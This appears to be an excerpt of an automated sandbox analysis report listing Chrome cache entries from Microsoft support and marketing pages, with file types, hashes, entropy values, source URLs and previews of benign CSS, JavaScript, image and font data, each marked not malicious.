                                                                                                                      SHA1:F7B2BE7FC2B063AAC03E76DF9F3E19D615970213
                                                                                                                      SHA-256:EBDD298DFD39A35E5F54469F12953081A17CBEA55F3A4A79C0FD4997D804F7D5
                                                                                                                      SHA-512:FCA692C8C7B104FB00C2E6D90C1A0D52A0FF93CDA626338D8FA114A0E9DCE2504DF9282868F98A46648A6E616A96ACD14CAD0460D72477421C8F5EE8F7D34256
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/css/MeControlCallout/teaching-callout.css?v=690pjf05o15fVEafEpUwgaF8vqVfOkp5wP1Jl9gE99U
                                                                                                                      Preview:.teachingCalloutPopover{position:absolute;z-index:10000;top:45px;width:336px;right:2vw;color:#000;background-color:#fff;border:1px solid #000;box-sizing:content-box}.teachingCalloutPopover .caretArrow{position:absolute;display:block;width:1rem;height:.5rem;margin:0 .3rem}.teachingCalloutPopover .caretArrow::before{position:absolute;display:block;content:"";border-color:transparent;border-style:solid}.teachingCalloutPopover .caretArrow::after{position:absolute;display:block;content:"";border-color:transparent;border-style:solid}.teachingCalloutPopover .caretArrowPosition{left:215px}.teachingCalloutPopover .win-icon{font-family:"Dev Center MDL2 Assets";font-style:normal;font-weight:normal;line-height:1;position:relative;top:1px;display:inline-block;vertical-align:baseline;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}#teachingCalloutDismiss,#teachingCalloutMessages{color:#000}.teachingCalloutHidden{visibility:hidden}.calloutMessageHidden{display:none}.caretArrowUp{

                                                                                                                      Chrome Cache Entry: 337

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65460)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):566897
                                                                                                                      Entropy (8bit):5.427009136389396
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:XU3oul3BmWRE2cXXB6l4QK/AAcRDsEbXiTMTyMm6KfjzVV/2GrKJB:XQY22kuQ4PJV/2GrKJB
                                                                                                                      MD5:C0BB28600CF931A17482376C5E27CABE
                                                                                                                      SHA1:3C9B65F94334C9312F168AC51D2067D07DB3A619
                                                                                                                      SHA-256:70EB3BBB025DC4C9CB7F7297EF68B928E4A7D9F77F8B60BD4DE6C526CF195464
                                                                                                                      SHA-512:5957C114E0A04A949C6B8D8C104F62D810079DA249B87C8E5D3183AD7E57A4B2657C9C7BE8C87FC990754FFD8B30BEC8719A1279AB7B6ECEB114D12690007268
                                                                                                                      Malicious:false
                                                                                                                      Preview:/*! For license information please see ucsCreativeService.js.LICENSE.txt */.!function(){var e={646:function(e,t,n){"use strict";function r(e){o.length||(i(),!0),o[o.length]=e}e.exports=r;var i,o=[],a=0,u=1024;function c(){for(;a<o.length;){var e=a;if(a+=1,o[e].call(),a>u){for(var t=0,n=o.length-a;t<n;t++)o[t]=o[t+a];o.length-=a,a=0}}o.length=0,a=0,!1}var l="undefined"!==typeof n.g?n.g:self,s=l.MutationObserver||l.WebKitMutationObserver;function f(e){return function(){var t=setTimeout(r,0),n=setInterval(r,50);function r(){clearTimeout(t),clearInterval(n),e()}}}i="function"===typeof s?function(e){var t=1,n=new s(e),r=document.createTextNode("");return n.observe(r,{characterData:!0}),function(){t=-t,r.data=t}}(c):f(c),r.requestFlush=i,r.makeRequestCallFromTimer=f},2277:function(e,t){var n;!function(){"use strict";var r={}.hasOwnProperty;function i(){for(var e=[],t=0;t<arguments.length;t++){var n=arguments[t];if(n){var o=typeof n;if("string"===o||"number"===o)e.push(n);else if(Array.isArra

                                                                                                                      Chrome Cache Entry: 338

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (45900)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):45963
                                                                                                                      Entropy (8bit):5.396725281317118
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:H/eCtKv79zpXXfoJLjtK8Dx1DieS3i8eqUvdX:W/vXQJJDD27W
                                                                                                                      MD5:F00CFBA8F9859DFEFDFE90EA520C6FCF
                                                                                                                      SHA1:B32E153588A287DE81050E327EB5BD7A90B04D99
                                                                                                                      SHA-256:977CC9882BA50763333DF64E98D26BC3C60A15D6EFA4A2C1FE70579985EDDF84
                                                                                                                      SHA-512:DA51FAB6D6A6B05A1730FB97656A496870FE1248616BC3F9DDBE101D1C189B6BEC7CAF63976418F88843AFA64763D25542787116FFE0E43E35BF3DCE61914DAB
                                                                                                                      Malicious:false
                                                                                                                      Preview:!function(){var t={8488:function(t,e,n){var r=n(2746);t.exports=r},3104:function(t,e,n){var r=n(7273);t.exports=r},6564:function(t,e,n){var r=n(2445),o=n(3478),i=n(7269),a=r.TypeError;t.exports=function(t){if(o(t))return t;throw a(i(t)+" is not a function")}},5719:function(t,e,n){var r=n(2445),o=n(3478),i=r.String,a=r.TypeError;t.exports=function(t){if("object"==typeof t||o(t))return t;throw a("Can't set "+i(t)+" as a prototype")}},1313:function(t,e,n){var r=n(4486),o=n(6635),i=n(9783),a=r("unscopables"),u=Array.prototype;null==u[a]&&i.f(u,a,{configurable:!0,value:o(null)}),t.exports=function(t){u[a][t]=!0}},3855:function(t,e,n){var r=n(2445),o=n(7455),i=r.TypeError;t.exports=function(t,e){if(o(e,t))return t;throw i("Incorrect invocation")}},4482:function(t,e,n){var r=n(2445),o=n(3406),i=r.String,a=r.TypeError;t.exports=function(t){if(o(t))return t;throw a(i(t)+" is not an object")}},3410:function(t,e,n){"use strict";var r=n(2445),o=n(6981),i=n(5633),a=n(2048),u=n(7065),s=n(1977),c=n(9

                                                                                                                      Chrome Cache Entry: 339

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (367), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):367
                                                                                                                      Entropy (8bit):4.9898089353102595
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:Q3RnadmyWRLnadIrM9nadYErmC+LGI1nadmWYElnH0IASS3c7swWJ/cxGPvZ/c8e:cYdIRGdIg8dlHEGIUd4Eh0IA1cbWNb9u
                                                                                                                      MD5:F81E446FAC9DB5FB37845DD4E069AE27
                                                                                                                      SHA1:DE12C417D44EC6A6AC52D5D41BBB35CE8C9A2097
                                                                                                                      SHA-256:CD4B2B854F0E1BF350B4E61D015794D0F33A0B187A0C78912085E4DB1CD65F0B
                                                                                                                      SHA-512:E13DDEDB6117E516E4278E4F1B6AA80DD62EAF8966E64F5D45D452D85FE2AAD990D770101934BC12AA37B4CDF8D3B3B86DDBD116B53E7C1AE1BFD73AA9C18584
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/back-to-top-button/v1/back-to-top-button/clientlibs/sites.min.ACSHASHf81e446fac9db5fb37845dd4e069ae27.js
                                                                                                                      Preview:'use strict';$(function(){var a=document.querySelector("#msChatContainer"),b=document.querySelector(".back-to-top.sticky"),c=document.querySelector(".fixed-back-to-top.fixed-sticky"),d=!(!document.querySelector("#storeassistantroot")||!window.storeAssistantReactJsLib);a&&b&&!d&&$(b).addClass("pageHasChatContainer");a&&c&&!d&&$(c).addClass("pageHasChatContainer")});

                                                                                                                      Chrome Cache Entry: 340

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (34235), with CRLF, LF line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):100769
                                                                                                                      Entropy (8bit):5.246112939487446
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:nmwNxXC4Pn+lnTKxKdzW7I1m7H+8l9ut+EVe/EdnoEnsJ:mwFwTXqwe/EdnoEnsJ
                                                                                                                      MD5:6FE3DD83A0D98BC1977F57EA33C37693
                                                                                                                      SHA1:8DF606F40E4CC8C07CE929D5A82FD5304EAF4EB7
                                                                                                                      SHA-256:A5268A183F2A091D2D17773997E89A25FC45CBD60E586EDF61F544FB85D6F6A8
                                                                                                                      SHA-512:B81C2EB3BFA8ECF1FFCBB24E4A776CD2B083460A0AC53213EAF48997AC27BB20F49CEFF3A098AEBA33B3AD4F74CA86B5018AFE6689A260F011DF4249029CE78B
                                                                                                                      Malicious:false
                                                                                                                      URL:https://mem.gfx.ms/scripts/me/MeControl/10.24228.4/en-US/meCore.min.js
                                                                                                                      Preview:MeControlDefine("meCore",["exports","@mecontrol/web-inline","@mecontrol/web-boot"],function(e,f,h){"use strict";var r=function(e,t){return(r=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)t.hasOwnProperty(n)&&(e[n]=t[n])})(e,t)};function t(e,t){function n(){this.constructor=e}r(e,t),e.prototype=null===t?Object.create(t):(n.prototype=t.prototype,new n)}var d=function(){return(d=Object.assign||function(e){for(var t,n=1,r=arguments.length;n<r;n++)for(var o in t=arguments[n])Object.prototype.hasOwnProperty.call(t,o)&&(e[o]=t[o]);return e}).apply(this,arguments)},s=function(){},i={},u=[],l=[];function v(e,t){var n,r,o,i,a=l;for(i=arguments.length;2<i--;)u.push(arguments[i]);for(t&&null!=t.children&&(u.length||u.push(t.children),delete t.children);u.length;)if((r=u.pop())&&void 0!==r.pop)for(i=r.length;i--;)u.push(r[i]);else"boolean"==typeof r&&(r=null),(o="function"!=typeof e)&&(null==r?r="":"number"==typeof r?r=String(r):"s

                                                                                                                      Chrome Cache Entry: 341

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 297 x 166, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):6270
                                                                                                                      Entropy (8bit):7.945330124411617
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:zS7+uH6tmhCSqN0K4Wykh3YMBYpAjav+tlXQ:m7vHqS9WyiooqSa2m
                                                                                                                      MD5:5C04A186E00E47C2F90ED18E03AB4093
                                                                                                                      SHA1:AC859795B92E3FA0FA88868AF532A3ED6F30F12A
                                                                                                                      SHA-256:1A16DBCD6926721D9C3AEB85429586B307F11D2093CF9AEEFDAA37898CB74D46
                                                                                                                      SHA-512:909830B01A21E61D98ADF1C61DFC44BD414CF03C51250A9DD7B5C26FB12D6334D984A21F25B5ED089FFDED4CAAA764579EEA317470C8616B7928E989B1A1778A
                                                                                                                      Malicious:false
                                                                                                                      Preview:.PNG........IHDR...)...........y;....pHYs.................sRGB.........gAMA......a.....IDATx...._S...SE4....&..DE0(.e.&jb...h....C..b,.i.na.2pI.P"H.!. ZB....w.~..g_._..$'.....>...k..p.....z............:.x...l...:.g.u.......Fz..I..Sh.......T..L)}.c..e.T1.........OL..T,\N\..K4.57.......{./.yR.H.JlQ......@..b...TAT.....)6.0-."... .&..:K.d]1L...R..lJ.......:.....9.|?}..........g..K..._.R....bk.i..E..K.%`...O....i..E.U....J.L.v.|..a........bV.jY.>3...M.$R......T.J.....(:......z..L..E5".w.wl.w.g.A1..E.|.......[*a...g..T.....J...U.z..|.l)..8..U..kp.cR........T...1..l.n|.i....5..*.k.j...q.F.}.E/#.j...D....T....3'..^.^:.4.Z....K.`..c@9.Y.=S.W..t..=&.Z.G.R-....%f..xG...".../l.....[.WTw/er#..I.....L.>..R\.........!..U. .5...C.ol.0%....=.....L..B..L..9.&..c.O%T|..h........egj?A......&...-*.X......;p...nf....T.....,bea.bj#.%....1..0L(Q.... ..sL..P...E.cX%.e...v.SQ".njw...:.>...\.%...b[T..cn'.#Z..i...C..%CX."....ej<.Q.LB......u.(.....E.?.'sR...DN

                                                                                                                      Chrome Cache Entry: 342

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):16
                                                                                                                      Entropy (8bit):3.625
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Hfn:/n
                                                                                                                      MD5:BEB5075867AC37A3C8903AB23A5ABA22
                                                                                                                      SHA1:86A41106441F795558A31574CBD24D5403E2F054
                                                                                                                      SHA-256:BD38B37956C818D4084814F47B69B7798F07AF7889D3D13DEBBD2D76ECB86095
                                                                                                                      SHA-512:976D88CFEF9792BC882CA8BB7F7F784BB97EA2046999D67C43DD4C2391943238BF9EE3DECD50DC2495829E65E9281D999E1272B188B489B1AFF59AECEE3E139A
                                                                                                                      Malicious:false
                                                                                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkV74dSiH35ARIFDel_Cl4=?alt=proto
                                                                                                                      Preview:CgkKBw3pfwpeGgA=

                                                                                                                      Chrome Cache Entry: 343

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):184
                                                                                                                      Entropy (8bit):4.7576002313728605
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:iAE3BMiX4RXBMgX/UfVgVISfKxW4qUu5UtgseBWBZ8VNZOjmeJRNnXE1V+o+:iAE36iIsgP0KOFMLs9cVNKmV+o+
                                                                                                                      MD5:8396009A793FDA25F0AD1C495EC773F4
                                                                                                                      SHA1:C0143C8B9F459323B1AE10D739835E5C8546DC0D
                                                                                                                      SHA-256:D660C1B711D4F046EC54D6681BF6B8664875AFA538957C7A9A874A9D09001D4F
                                                                                                                      SHA-512:C11201AF295FB01B5B585CB3BE448E0573ED5B96C4FB24B2E63809CDE741D2B1903F00FCA14F760262E7045C6FAC47545C4B3D4E45F94A4C28C51B59AD6ECC38
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/areaheading/v1/areaheading/clientlibs/site.min.ACSHASH8396009a793fda25f0ad1c495ec773f4.css
                                                                                                                      Preview:.areaheading .sr-text{border:0;clip:rect(1px,1px,1px,1px);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-wrap:normal !important}

                                                                                                                      Chrome Cache Entry: 344

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 36748, version 0.0
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):36748
                                                                                                                      Entropy (8bit):7.993571055882259
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:768:J1RjXb4nQ5CZV6qEfz1mfNwUcf0Rn//WAlsuqjCf8qs2opmUrYSRc:RXEnQ5fzAlVe0R//WAx7b//Uxc
                                                                                                                      MD5:88749B8058F99835F5A6B87FCC9CEDA1
                                                                                                                      SHA1:A491726E067475E187E270D4469A96E016BD30A7
                                                                                                                      SHA-256:F447D199F99F6EC55B5308B737A69F384032D3D0C1D05FBC41782AA50ECEB92C
                                                                                                                      SHA-512:D595CC3E4220CB879389138D34B2DFBC9DC40EA5E83A81944FA73CBDFBBFC70D53285F8A11CEB921F55C7171EFB4A1242AE1819F0A505C0ECA06772357B2AF65
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/css/fonts/support-icons/fluent/latest_v1_95.woff2
                                                                                                                      Preview:wOF2..............M....<.........................`..b........W.6.$..<..4.. ..X. [..QD`...P.<DT.~X..I...."!........_..M|..|[.'...FR.EH?b......0...J.....k...K.....[...1ir.x.I)\H...0..8q..... i....u.~..1...F..Cd........px~.=%..D.H.....(..@A......N..p.\.v...m..[.nkW...m...O]....6.7.;.'$....D.4..q.?.E.\%5S.UjB...V)..x...Y.C.........o....j..4@r..P{.H......f.....8 ..Q....(......f..8p....\d.....R.4......m........%r.K.....F3..I...!.k8r.d{4.OD&...0...r..B.2e.4u.....Q._...lR.v...F..p...J%IQ.j.....alI.D..&.?..... .N...Z=...G.%..o.N..I6.."u.j._.!...N..L...).&I...../..N.n......J].%....5.p.H.#+..dw..".h.."..O...i.D.TI..I.&.J...%g..-Y,.-.-',O.....y.gm.l3m+......Q..Q..P..Q....m......0.#0..1.........q.wp.....'..#.(..L...SQ*I...5..4.6.f.M.....ct.....E.......$9.K..sRN.i8...\.+s5..-.+...<.G....3x=o...^.e-YG....&.G......B.R..".W.S..C.X.W.UT..t=.H7..X=W...Z.]......T'LR...05L]...7#.....7........>.>..Q....q.q..Y.peu.s.pmq.u..4.,.\.....g.t..........DB.!.<v..|R..E.G.E.]5.

                                                                                                                      Chrome Cache Entry: 345

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (26071), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):26086
                                                                                                                      Entropy (8bit):5.432818104736514
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:us282x+ZOj5jMGgKAztoDx3SF/uuRcFoyJD53QDCMkDoEo91YGtua6ca+D+oOLcG:arB/0FxO4Qcr9SGYafV5G
                                                                                                                      MD5:A923FB946929633E387E4D2017006546
                                                                                                                      SHA1:84D3DCF57A9EF34EA731A1B28F9ECE4B0B267A08
                                                                                                                      SHA-256:67A664918FD7F224CCE362DB7078440CD693E1EF6B30EFF33C06F112C17102FA
                                                                                                                      SHA-512:A974D3511DD1ED3197BC6A90F9561CDB83120E99D8276C38E32C79005E59C5C7048C8652E3DF5A1DB06191B3B6793A4C75A5C2060CC12ACB36D1E6F31C2E6BFB
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/css/Article/css.css?v=Z6ZkkY_X8iTM42LbcHhEDNaT4e9rMO_zPAbxEsFxAvo
                                                                                                                      Preview:.@media screen{-ms-viewport{width:device-width}}@media screen and (-ms-high-contrast: active){textarea[placeholder],input[type=search][placeholder],input[type=text][placeholder]{border-color:WindowText}}header,footer,hgroup,nav,section{display:block}.font-bold{font-weight:600}.ocHidden{display:none !important}.clear-fix:after{content:".";clear:both;display:block;height:0;visibility:hidden}input{-webkit-appearance:none;-webkit-border-radius:0}#obf-EmailCheckBox,#obf-BasicFormScreenshotCheckbox{-webkit-appearance:revert}.content-wrapper{margin:0 auto;width:100%}.main-content,.ocFB,#ocAsstHelp{font-size:62.5%}.main-content #ocAsstHelp{font-size:100%}#product,#home,#category,#endnode{min-width:1220px;margin-top:10px}#endnode{margin-top:0}#universal-header-search-auto-suggest-transparent,.f-auto-suggest-no-results.f-auto-suggest-no-results{display:none}.grd{display:block;position:relative;width:90%;margin:0 auto;max-width:1440px;padding:0 1em;padding:0 1vw}.grd *{box-sizing:border-box}.gr

                                                                                                                      Chrome Cache Entry: 346

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):406
                                                                                                                      Entropy (8bit):4.645093417199183
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:M9BAG1/qAT9BAs1/qKdDYT9BAR6T9BAOk/CMRZcJfRDZ:M9p/qS91/qfT9J9yRC5N
                                                                                                                      MD5:F9F2395C582FA601707B7A5DFAE9F05F
                                                                                                                      SHA1:27B15AECD0BFDD3B25556AC00755856D4D331E0D
                                                                                                                      SHA-256:D7D6D06624D4BDF6935B848DF342CE322D02B58D12BF12149DF92D557E5E9BC4
                                                                                                                      SHA-512:F3378927D96B0B172981A821A8C2A16D0F397ED92E835B7C46316FC48350402D972A5411F0FA4C260F205AA1F7917F83F8247BF8A62C7F22E0076B168275B1E9
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-uhf.min.ACSHASHf9f2395c582fa601707b7a5dfae9f05f.css
                                                                                                                      Preview:.c-uhfh .c-action-trigger.glyph-shopping-cart span:not(.shopping-cart-amount),.c-uhfh .c-action-trigger.glyph-shopping-bag span:not(.shopping-cart-amount){line-height:48px !important}..c-uhfh .c-action-trigger.glyph-shopping-cart:after,.c-uhfh .c-action-trigger.glyph-shopping-bag:after{line-height:43px}..c-uhfh.c-sgl-stck .c-search button{line-height:18px}..msame_Header_name{line-height:44px !important}

                                                                                                                      Chrome Cache Entry: 347

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65460)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):566897
                                                                                                                      Entropy (8bit):5.427009136389396
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:XU3oul3BmWRE2cXXB6l4QK/AAcRDsEbXiTMTyMm6KfjzVV/2GrKJB:XQY22kuQ4PJV/2GrKJB
                                                                                                                      MD5:C0BB28600CF931A17482376C5E27CABE
                                                                                                                      SHA1:3C9B65F94334C9312F168AC51D2067D07DB3A619
                                                                                                                      SHA-256:70EB3BBB025DC4C9CB7F7297EF68B928E4A7D9F77F8B60BD4DE6C526CF195464
                                                                                                                      SHA-512:5957C114E0A04A949C6B8D8C104F62D810079DA249B87C8E5D3183AD7E57A4B2657C9C7BE8C87FC990754FFD8B30BEC8719A1279AB7B6ECEB114D12690007268
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/lib/ucs/dist/ucsCreativeService.js?v=cOs7uwJdxMnLf3KX72i5KOSn2fd_i2C9TebFJs8ZVGQ
                                                                                                                      Preview:/*! For license information please see ucsCreativeService.js.LICENSE.txt */.!function(){var e={646:function(e,t,n){"use strict";function r(e){o.length||(i(),!0),o[o.length]=e}e.exports=r;var i,o=[],a=0,u=1024;function c(){for(;a<o.length;){var e=a;if(a+=1,o[e].call(),a>u){for(var t=0,n=o.length-a;t<n;t++)o[t]=o[t+a];o.length-=a,a=0}}o.length=0,a=0,!1}var l="undefined"!==typeof n.g?n.g:self,s=l.MutationObserver||l.WebKitMutationObserver;function f(e){return function(){var t=setTimeout(r,0),n=setInterval(r,50);function r(){clearTimeout(t),clearInterval(n),e()}}}i="function"===typeof s?function(e){var t=1,n=new s(e),r=document.createTextNode("");return n.observe(r,{characterData:!0}),function(){t=-t,r.data=t}}(c):f(c),r.requestFlush=i,r.makeRequestCallFromTimer=f},2277:function(e,t){var n;!function(){"use strict";var r={}.hasOwnProperty;function i(){for(var e=[],t=0;t<arguments.length;t++){var n=arguments[t];if(n){var o=typeof n;if("string"===o||"number"===o)e.push(n);else if(Array.isArra

                                                                                                                      Chrome Cache Entry: 348

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):106
                                                                                                                      Entropy (8bit):4.458110094106728
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:tM2Vx6IUARGvdMFev/KKgJWnLgsMoiFiAn:tZViARGvqeqrJWn6omiAn
                                                                                                                      MD5:0FA38DB43EB641C9AC1CA868CE3D294F
                                                                                                                      SHA1:ED3CC5587BAFFD322B16002184FC8581929A953F
                                                                                                                      SHA-256:81EC0312140FFDCF5216A8F1336E2D5909896CD0AAED9E22E60F3BFE7F78B798
                                                                                                                      SHA-512:44745BBE21317827C76FDD62CDD7982F794D02C1BCA576C4B822ABD81BFEFDDC273FF335EFBE912AD6D15571664C28A01B1C8059E50945B667FDFFC330574F68
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/socialfollow/v1/socialfollow/clientlibs/site.min.ACSHASH0fa38db43eb641c9ac1ca868ce3d294f.css
                                                                                                                      Preview:@media screen and (max-width: 320px) {. .socialfollow-ul {. margin-top: 2px !important; . }.}

                                                                                                                      Chrome Cache Entry: 349

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (64241)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):171505
                                                                                                                      Entropy (8bit):5.043804815226508
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:jzCPZkTP3bDLH0tfRqQ0xtLfj4ZDSIpTt813viY8R1j35Ap7LQZLPPJH7PAbOCxb:jlZAW3kJeqg
                                                                                                                      MD5:8F186BBA557DC6140841C682AF4D60EE
                                                                                                                      SHA1:CE2F96E57EE3D9ED15B8A2DD3EBDC7E54439AF98
                                                                                                                      SHA-256:CDA4813A965CCD1AAA50550D08B928AAF4C7F50B6F77823213FE3A97E806C2F1
                                                                                                                      SHA-512:17ACC430C28A171C1FD029C1B0EB67BE14ED41ED9F7F10E4040ABA1FA39B8DA5CAC7CDF979BAB6CAFAD126AA94C88D123F170E78C51745C3833AE80AD23FB36A
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/onerfstatics/marketingsites-eus-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/1b-9d8ed9/c9-be0100/a6-e969ef/43-9f2e7c/82-8b5456/a0-5d3913/52-918540/ca-ae3ce4?ver=2.0&_cf=02242021_3231
                                                                                                                      Preview:@charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh

                                                                                                                      Chrome Cache Entry: 350

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (10387), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):10930
                                                                                                                      Entropy (8bit):4.777922581824855
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:4CGjCf1IQNnJ0DuXGJzhIGcjfkfN9xekArvsAJKom+tmTjotKfCYzwsm1L+mFb:4CGjCf3Nn2DuWPlPIvPm+trQfCYiL+wb
                                                                                                                      MD5:509E44BDCA06692FD924908DE96BE75B
                                                                                                                      SHA1:2B68EABA6109F02706D13775CBC357CA40785ABE
                                                                                                                      SHA-256:37D8CC7CC2283BFB3B3804CDD23E4B62A98EF4C0AA1C38DFA5A515D91B9A132F
                                                                                                                      SHA-512:44E648E2433C01B879CF952AD1ACBAEE97EF82C18F846429019EF343E5272B568BE3BD9CC530E244E1E282D7CF42A1D215E79756968A4D82B845F0E242551ACF
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/css/glyphs/glyphs.css?v=N9jMfMIoO_s7OATN0j5LYqmO9MCqHDjfpaUV2RuaEy8
                                                                                                                      Preview:..icon-fluent{font-family:Support Fluent Icons;font-style:normal;font-weight:normal;line-height:1px;display:inline-block;vertical-align:baseline;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.supTabControlHeader .supTabControlHeaderActive .icon-fluent{font-weight:900;color:#000}.supTabControlHeader .icon-fluent{color:gray;font-size:.9em;padding-right:5px}html[dir=rtl] .supTabControlHeader .icon-fluent{padding-left:5px}.icon-mdl2{font-family:Support MDL2 Assets;font-style:normal;font-weight:normal;line-height:1px;display:inline-block;vertical-align:baseline;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.supTabControlHeader .supTabControlHeaderActive .icon-mdl2{font-weight:900;color:#000}.supTabControlHeader .icon-mdl2{color:gray;font-size:.9em;padding-right:5px}html[dir=rtl] .supTabControlHeader .icon-mdl2{padding-left:5px}.icon-accept:before{content:"."}.icon-actioncenter:before{content:"."}.icon-actioncenternotification:before{conten

                                                                                                                      Chrome Cache Entry: 351

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (42133)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):138268
                                                                                                                      Entropy (8bit):5.224497765711851
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:1f4HuF7pxnISnJ9d1EwgXA7CisuMK/xw/:1f4Hu1I+Tw/
                                                                                                                      MD5:5B85413B96AF340238B93068CDB641FB
                                                                                                                      SHA1:D949C985DF4F80FAB0CF036A1DD86C63CA342F1F
                                                                                                                      SHA-256:1B448C19C6DF1F2D15399A710A73BB3EC0C5233B571CDFAE9CCA315E6E13FB85
                                                                                                                      SHA-512:5B7E26BB4C72A8D8EE6CD20EEEA354ADD396F74289BD3E42CD1D6C8A5D3FA1B190CC62B953CAF4FA38EFDA0983F90F937276C8797EB2E1BADC11F9F5161117CE
                                                                                                                      Malicious:false
